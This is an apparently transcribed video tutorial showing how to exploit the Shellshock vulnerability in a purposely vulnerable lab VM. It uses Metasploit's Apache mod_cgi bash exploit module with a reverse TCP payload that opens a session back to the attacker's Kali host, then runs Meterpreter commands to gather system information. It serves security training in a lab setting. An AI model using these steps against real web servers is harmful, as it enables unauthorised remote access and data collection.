Hacking web server. In this video I will demonstrate how to exploit shellshock vulnerability using Kali Linux. So let's begin. Open google.com and just search for shellshock space VM and click here. There is a shellshock vulnerability already present in this ISO image. Just click on it and download it. I've already downloaded in a D drive. Here you can see ISO image file of shellshock vulnerabilities based operating system. Now open VMware workstation and create a new virtual machine. Select typical, click on next. Select installer disk image file from a D drive. Click on next. Select Linux and select Ubuntu. Click on next. Where do you want to install this virtual machine? Select VHD. Click on OK. Click on next. Click on next. Click on finish. See, memory is 1 GB. Just click on power on this virtual machine. Open Kali Linux also. Operating system is already loaded. First check IP address of it. It has IP address 192.168.159.141 and Kali Linux has IP address 129. Open another tab and just make sure PostgreSQL service is running. It is inactive, just start it. Now need to run MSF console. Type command use space exploit multi http apache _mode _cgi _bash _env _exec. Now we need to set localhost. Localhost has IP address 129. Just type 192.168.159.129. Just give enter. Now set remote host IP address. Remote host as 159.141. Here you can see IP address is 141. Now we need to type set target URI. So you need to first open Firefox and first check Apache is running or not. So give IP address 192.168.159.141. Apache is working fine. Now let me check status of the CGI. So type cgi-bin slash status. It is also working fine. So now we need to go to the target URI and just type cgi bin status and just set payload to launch reverse connection to this machine. Define x86 slash metasploit reverse underscore TCP. Payload is not working. We need to delete 6. Just give enter. It is working. And just give command exploit. Here you can see the magic metasploit session 1 is opened, and now you can get help of the command using help command. Here you can see all the commands available to get information of the remote machines. So now use ARP, it will give you ARP informations of the remote machine. You can use ifconfig, it will give you IP address information. Now if you want to check shell is not working, use help command. Shell is not working. Now there is a lot of other commands also available, like version informations, sessions informations, using sessions command you can take control over the sessions. Now you run shell command. It is trying to get shell of the remote machine. Let me quit because it is not able to take control. You can run ifconfig command to check IP address of the remote machine. Here you can see IP address information available, ARP information. You can list folder. Here you can see where you are present. Use cd dot, use ls command. You can check status of your working directory. You can get help using help command. Like if you want to get system information, sysinfo, it will give you information about the system. You want to check user informations, so use get UID. You can also use root information of the remote machine. You can use cp command, cat command, cd command, mkdir command. So there is lots of commands available in help to get information about the remote machines. So hope you understand how we can exploit vulnerabilities. In this video for demonstration purpose, I demonstrate shell shock vulnerability exploitation. So hope you understand how you can use Kali Linux MSF console to hack vulnerable machines. So thank you for watching this video.